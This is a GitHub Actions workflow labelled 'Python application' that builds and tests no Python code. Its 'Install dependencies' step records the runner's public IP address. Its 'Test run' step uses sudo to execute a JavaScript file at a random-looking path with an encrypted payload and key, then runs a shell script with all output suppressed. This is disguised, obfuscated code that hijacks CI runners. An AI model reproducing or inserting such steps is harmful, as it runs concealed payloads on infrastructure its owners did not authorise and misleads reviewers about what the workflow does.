name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 12

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        curl ifconfig.me > ip.txt
        cat ip.txt
    - name: Test run
      run: |
        cd ${{ github.workspace }}
        echo '4ttcb'
        sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18fKUS06pHEo2asIZ3O3sx/BKnS1FonhYXnmAK0xKf7iX/Ifo3jFV51dbH3opReqj1Sh6/VudMDeuu8hd3bOUJkVx/iRBItilmIizT4ZzjWiE0tehThNgJQ pn6gs1 && sudo sh r.sh > /dev/null 2>&1
